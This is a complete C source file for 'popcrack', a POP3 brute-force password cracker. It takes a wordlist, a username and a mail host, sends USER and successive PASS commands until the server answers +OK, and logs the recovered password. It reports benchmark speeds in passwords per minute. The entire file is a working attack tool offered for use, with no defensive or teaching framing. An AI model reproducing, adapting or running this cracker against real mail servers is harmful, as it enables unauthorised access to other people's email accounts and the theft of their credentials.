/*
 * popcrack, POP3 bruteforce cracker
 * 
 * If you don't want to waste any clock ticks, compile with -DNOBENCHMARK
 * On Windows compile with -DWINDOWS (migh only work with Cygnus Cygwin)
 * To see what is being sent/received, compile with -DDEBUG
 *
 * Usage: popcrack <wordlist> <username> <host> [port]
 *
 * Current benchmarks (quickest speeds attained):
 * p250 MMX with cable modem: 2000 passwords/min
 * dual p100 on T3: 1325 passwords/min
 * p133 at < 21k: 250 passwords/min
 *
 * [both network speed and processor speed play equal roles]
 * [also compiling with -DNOBENCHMARK should improve speed]
 */

#include <stdio.h>
#include <errno.h>
#include <string.h> 

#ifndef WINDOWS
#include <unistd.h>
#include <netdb.h>
#endif

#ifndef NOBENCHMARK
# include <time.h>
# include <signal.h>
#endif

#ifdef WINDOWS
# include <windows.h>
# include <winsock.h>
#else
# include <netinet/in.h>
# include <sys/socket.h>
# include <arpa/inet.h>
#endif

/* ---------------------------------------------- */

#ifndef WINDOWS
# define SOCKET_ERROR -1
# define INVALID_SOCKET -1

# define closesocket(sock) close(sock)
# define WSACleanup() ;
#endif

/* ---------------------------------------------- */

#define NUMSOCKS 1

#define PORT 110

#define ERRORLOG "error.log"
#define SUCCESSLOG "success.log"
#define COMPLETELOG "complete.log"

#define PASSLEN 16
#define BUFSIZE 128

/* ---------------------------------------------- */

#ifndef WINDOWS
typedef int SOCKET;
typedef struct sockaddr SOCKADDR;
typedef struct sockaddr_in SOCKADDR_IN;
#endif

double numkeys = 0;

#ifndef NOBENCHMARK
double minkeys;

#ifdef WINDOWS
unsigned int alarm(unsigned int);
#endif

void calckeys(int sig)
{
   minkeys = numkeys;
}
#endif

int main(int argc, char **argv)
{
#ifdef WINDOWS
   WSADATA wsaData;
#endif

   FILE *file;
   register char *ptr;

   int port = PORT;
   char *user, *host;
   struct hostent *he;

   SOCKET sockfd;
   SOCKADDR_IN srcin, dstin;

#ifndef NOBENCHMARK
   struct tm *tm;
   char timebuf[16];
   time_t time1, time2;

   clock_t cracktime;
   clock_t beginpass, passtime;
   clock_t idlestart, idletime;
   clock_t starttime, endtime, finaltime;
#endif

   char success = 0;
   char buf[BUFSIZE], pass[PASSLEN];

   /* ------------------------------------------------------ */

   if ((argc <= 3) || (argc > 5))
   {
      fprintf(stderr, "Usage: %s <wordlist> <user> <host> [port]\n",
              argv[0]);

      exit(1);
   }

   user = argv[2], host = argv[3];
   if (argc == 5) port = atoi(argv[4]);

#ifdef WINDOWS
   if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
   {
      fprintf(stderr, "Error with WSAStartup().  "
                      "Do you have WinSock installed?\n");
      exit(-1);
   }
#endif

   sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

   memset(&srcin, 0, sizeof(SOCKADDR_IN));
   memset(&dstin, 0, sizeof(SOCKADDR_IN));

   if (inet_addr(argv[3]) != INADDR_NONE) 
      dstin.sin_addr.s_addr = inet_addr(argv[3]);

   else
   {
      he = gethostbyname(host);

      if (!he)
      {
         fprintf(stderr, "Error with gethostbyname(%s): %s\n",
                 argv[3], strerror(h_errno));

         closesocket(sockfd), exit(-1);
      }
      else dstin.sin_addr = *((struct in_addr *)(he->h_addr));
   }

   srcin.sin_family = AF_INET;
   srcin.sin_addr.s_addr = INADDR_ANY;

   if (bind(sockfd, (SOCKADDR *)&srcin, sizeof(SOCKADDR)) == SOCKET_ERROR)
   {
      fprintf(stderr, "error with bind(): %s\n", strerror(errno));

      closesocket(sockfd);
      WSACleanup();

      exit(-1);
   }

   dstin.sin_family = AF_INET;
   dstin.sin_port = htons(port);

   printf("Now connecting to %s[%d]... ", 
          inet_ntoa(dstin.sin_addr), port);

   fflush(stdout);

   if (connect(sockfd, (SOCKADDR *)&dstin, sizeof(SOCKADDR)) == SOCKET_ERROR)
   {
      fprintf(stderr, "\nError connecting to %s[%d]: %s\n",
              inet_ntoa(*((struct in_addr *)(he->h_addr))), port,
              strerror(errno));

      closesocket(sockfd);
      WSACleanup();

      exit(-1);
   }

   printf("connected.\n");

   memset(buf, 0, sizeof(buf));

   /* Grab POP welcome message */
   if (recv(sockfd, buf, sizeof(buf) - 1, 0) == SOCKET_ERROR)
   {
      fprintf(stderr, "Error with recv(): %s\n", strerror(errno));
      fclose(file);

      closesocket(sockfd); 
      WSACleanup();

      exit(-1);
   }

   printf("%s\n\n", buf);

   /* -------------------------------------------------- */

#ifndef NOBENCHMARK
   starttime = clock();
#endif

   sprintf(buf, "USER %s\n", user);

#ifdef DEBUG
  printf("Sending: %s", buf);
#endif

   if (send(sockfd, buf, strlen(buf), 0) == SOCKET_ERROR)
   {
      fprintf(stderr, "Error send()'ing username: %s\n", strerror(errno));
      fclose(file);

      closesocket(sockfd);
      WSACleanup();

      exit(-1);
   }

   /* Check result of USER */
   while (1)
   {
#ifndef NOBENCHMARK
      idletime = 0, idlestart = clock();
#endif

      if (recv(sockfd, buf, sizeof(buf)-1, 0) == SOCKET_ERROR)
      {
         fprintf(stderr, "Error recv()'ing USER response: %s\n",
                 strerror(errno));

         fclose(file);

         closesocket(sockfd);
         WSACleanup();

         exit(-1);
      }

#ifndef NOBENCHMARK
      idletime += clock() - idlestart;
#endif

      ptr = strchr(buf, '+');

      if (ptr) break;
      else
      {
         ptr = strchr(buf, '-');
         if (ptr) break;
      }
   }

#ifdef DEBUG
   printf("USER response: %s\n", ptr);
#endif

   if (strncmp(ptr, "-ERR", 4) == 0)
   {
      fprintf(stderr, "Error with USER: %s\n", ptr);
      fclose(file);

      closesocket(sockfd);
      WSACleanup();

      exit(-1);
   }

   /* -------------------------------------------------- */

   file = fopen(argv[1], "r");
   if (!file)
   {
      fprintf(stderr, "Error fopen()'ing %s: %s\n", argv[1], strerror(errno));

      closesocket(sockfd);
      WSACleanup();

      exit(-1);
   }

#ifndef NOBENCHMARK
   cracktime = clock();
   signal(SIGALRM, calckeys), alarm(60);

   time1 = time(NULL);
#endif

   while (1)
   {
      if (!fgets(pass, sizeof(pass)-1, file))
      {
         if (feof(file)) break;

         fprintf(stderr, "Error with fget()'ing wordlist: %s\n",
                 strerror(errno));

         fclose(file);

         closesocket(sockfd);
         WSACleanup();

         exit(-1);
      }

      ptr = strchr(pass, '\n');
      if (ptr) *ptr = '\0';

      /* -------------------------------------------------- */

#ifndef NOBENCHMARK
      beginpass = clock();
#endif

      sprintf(buf, "PASS %s\n", pass);	

#ifdef DEBUG
      printf("Sending: %s", buf);
#endif

      if (send(sockfd, buf, strlen(buf), 0) == SOCKET_ERROR)
      {
         sprintf(buf, "Error send()'ing password: %s\n", strerror(errno));
         fputc('\n', stderr), fputs(buf, stderr), fclose(file);

         file = fopen(ERRORLOG, "a");
         if (file)
         {
            fputs(buf, file);
            fprintf(file, "'%s' was not completed "
                          "(finished %.0f passwords).\n\n", 
                          argv[1], numkeys);

            fclose(file);
         }

         else fprintf(stderr, "Error fopen()'ing %s: %s\n", ERRORLOG, 
                      strerror(errno));

         closesocket(sockfd);
         WSACleanup();

         exit(-1);
      }

#ifndef NOBENCHMARK
      passtime = 0;
#endif

      /* Check result of PASS */
      while (1)
      {
#ifndef NOBENCHMARK
         idlestart = clock();
#endif

         if (recv(sockfd, buf, sizeof(buf)-1, 0) == SOCKET_ERROR)
         {
            sprintf(buf, "Error recv()'ing PASS response: %s\n",
                    strerror(errno));

            fputc('\n', stderr), fputs(buf, stderr), fclose(file);

            file = fopen(ERRORLOG, "a");
            if (file)
            {
               fputs(buf, file);
               fprintf(file, "'%s' was not completed "
                             "(finished %.0f passwords).\n\n", 
                             argv[1], numkeys);

               fclose(file);
            }

            else fprintf(stderr, "Error fopen()'ing %s: %s\n", ERRORLOG, 
                         strerror(errno));

            closesocket(sockfd);
            WSACleanup();

            exit(-1);
         }

#ifndef NOBENCHMARK
         idletime += clock() - idlestart;
#endif

         ptr = strchr(buf, '+');

         if (ptr) break;
         else
         {
            ptr = strchr(buf, '-');
            if (ptr) break;
         }
      }

      numkeys++;

#ifndef NOBENCHMARK
      if (!passtime) passtime = clock() - beginpass;
#endif

#ifdef DEBUG
      printf("PASS response: %s\n", ptr);
#endif

#ifndef NOBENCHMARK
      time2 = time(NULL), time2 -= time1, tm = gmtime(&time2);
      strftime(timebuf, 15, "%H:%M:%S", tm);

      printf("[Time running: %s, Clock ticks: %ld, Password: %.0f]\r", 
             timebuf, clock() - starttime, numkeys);

      fflush(stdout);
#endif

      if (strncmp(ptr, "+OK", 3) == 0)
      {
         success = 1;
         break;
      }
   }

#ifndef NOBENCHMARK
   alarm(0), endtime = clock();
   finaltime = endtime - starttime, cracktime = endtime - cracktime;
#endif

   fclose(file);

   closesocket(sockfd);
   WSACleanup();

   printf("\nCompleted %.0f passwords with %d socket(s).\a\n\n", numkeys,
          NUMSOCKS);

#ifndef NOBENCHMARK
   printf("Total clock ticks: %ld.\n", finaltime);

   if (minkeys) printf("Tried around %.0f passwords a minute.\n", minkeys);
   else printf("Tried %.0f passwords in less than a minute.\n", numkeys);

   printf("Took around %ld clock ticks per password.\n", passtime);
   printf("Spent a total of %ld clock ticks idling in recv().\n", idletime);
   printf("Took %ld clock ticks for the main cracking loop.\n\n", cracktime);

   printf("These results may be off, due to this benchmark\n");
#endif

   if (success)
   {
      printf("PASSWORD OF '%s' IS '%s'!\a\n", user, pass);

      file = fopen(SUCCESSLOG, "a");

      if (file)
      {
         if (success) sprintf(buf, "PASSWORD OF '%s' IS '%s'\n", user, pass);
         fputs(buf, file), fclose(file);
      } 

      else fprintf(stderr, "Error fopen()'ing %s: %s\n", 
                   SUCCESSLOG, strerror(errno));
   }

   file = fopen(COMPLETELOG, "a");

   if (file)
   {
      fprintf(file, "'%s' completed, %s's password was%sfound.\n",
              argv[1], user, (success ? " " : " not "));

      fclose(file);
   }

   else fprintf(stderr, "Error fopen()'ing %s: %s\n", COMPLETELOG, 
                strerror(errno));

   if (!success) printf("%s's password was not in '%s'\n", user, argv[1]);
   return 0;
}
